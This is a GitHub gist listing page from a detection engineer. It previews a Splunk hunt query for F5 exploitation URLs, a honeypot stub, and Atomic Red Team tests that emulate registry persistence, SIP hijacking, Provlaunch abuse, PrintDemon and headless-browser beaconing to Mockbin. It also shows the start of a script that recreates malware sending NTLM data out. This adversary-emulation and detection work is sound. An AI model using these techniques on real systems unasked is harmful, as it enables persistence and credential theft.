Skip to content

Instantly share code, notes, and snippets.

View MHaggis's full-sized avatar
:shipit:

Michael Haag MHaggis

:shipit:
358 followers · 86 following
View GitHub Profile
@MHaggis
MHaggis / F5 TMUI Exploitation CVE-2023-46747.md
Last active November 2, 2023 15:59

my fav one:

| tstats count from datamodel=Web.Web where 
    Web.url="*/tmui/system/user/create*" OR 
    Web.url="*/tmui/system/user/list*" OR 
    Web.url="*mgmt/tm/util/bash*" OR 
    Web.url="*/tmui/login.jsp" OR 
    Web.url="*/mgmt/shared/authn/login" OR 
    Web.url="*/mgmt/tm/auth/user/*"
@MHaggis
MHaggis / HoneyMimiclite.py
Created October 31, 2023 18:12
You'll prob need to change line 6 or make a logs dir.
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime
import logging
current_datetime = datetime.now().strftime('%Y%m%d_%H%M%S')
log_file_name = f'logs/app_{current_datetime}.log'
class EmulatedServer(BaseHTTPRequestHandler):
pass
@MHaggis
MHaggis / T1547.yaml
Created October 18, 2023 15:23
Atomic Red Team
- name: 'HKCU - Add Registry Key Under CurrentVersion\Windows'
description: |
This test attempts to add a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
which points to a potential payload "calc.exe". This can be indicative of an attacker trying to achieve persistence or other malicious objectives.
References:
- https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
- https://persistence-info.github.io/Data/windowsload.html
supported_platforms:
- windows
input_arguments:
@MHaggis
MHaggis / T1553.003.yaml
Created October 11, 2023 11:18
attack_technique: T1553.003
display_name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
atomic_tests:
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675
description: |
Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from
https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
the system to utilize it during signature checks, and logging said checks.
supported_platforms:
@MHaggis
MHaggis / SIP_inputs.md
Created October 10, 2023 19:47
Inventory SIP

Place in inputs.conf and watch the SIP roll in.

# Modify for your environment. Make sure the sourcetype matches the analytic as needed.
[powershell://SubjectInterfacePackage]
script = $registryPaths = @("HKLM:\SOFTWARE\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1"); $registryPaths | ForEach-Object {Get-ChildItem -Recurse $_ | ForEach-Object {$key=$_; $props=$key.GetValueNames(); $propDataPairs=@{}; for ($i=0; $i -lt $props.Length; $i++) {$propDataPairs[$props[$i]]=$key.GetValue($props[$i])}; $outputObj=[PSCustomObject]@{Path=$key.PSPath;PSChildName=$key.PSChildName}; $propDataPairs.GetEnumerator() | ForEach-Object {Add-Member -InputObject $outputObj -NotePropertyName $_.Name -NotePropertyValue $_.Val
@MHaggis
MHaggis / T1218.yaml
Created September 26, 2023 18:44
Atomic Test for https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
description: |
Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
- https://twitter.com/0gtweet/status/1674399582162153472
- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
Registry keys are deleted after successful execution.
supported_platforms:
- windows
executor:
command: |
@MHaggis
MHaggis / T1574.001.yaml
Created September 20, 2023 14:40
#AtomicWednesdays T1574.001 - PrintDemon
- name: PrintDemon
description: |
Atomic Test to emulate PrintDemon.
[Reference](https://github.com/BC-SECURITY/Invoke-PrintDemon)
Also seen on TryHackme - https://tryhackme.com/room/dllhijacking
supported_platforms:
- windows
input_arguments:
dll_path:
description: File path for ualapi.dll
@MHaggis
MHaggis / T1564.003.yaml
Created September 13, 2023 15:46
Mockbin Atomic Test with Headless browsing
- name: Headless Browser Accessing Mockbin
description: |
The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.
supported_platforms:
- windows
input_arguments:
bin_id:
description: Mockbin.org BIN ID
type: string
default: f6b9a876-a826-4ac0-83b8-639d6ad516ec
@MHaggis
MHaggis / getmockbin.py
Created September 11, 2023 14:07
import requests
import os
import json
file_path = "ids.txt"
base_url = "https://mockbin.org/bin"
log_directory = "logs"
script_directory = "scripts"
if not os.path.exists(log_directory):
@MHaggis
MHaggis / FancyNTLMBear.md
Created September 6, 2023 13:45
https://www.virustotal.com/gui/file/52951f2d92e3d547bad86e33c1b0a8622ac391c614efa3c5d167d8a825937179

Original sending to Mockbin (use a new mockbin)

[byte[]]$NTLMType2 =
@(
    0x4e,0x54,0x4c,0x4d,
    0x53,0x53,0x50,0x00,
    0x02,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,
    0x00,0x28,0x00,0x00,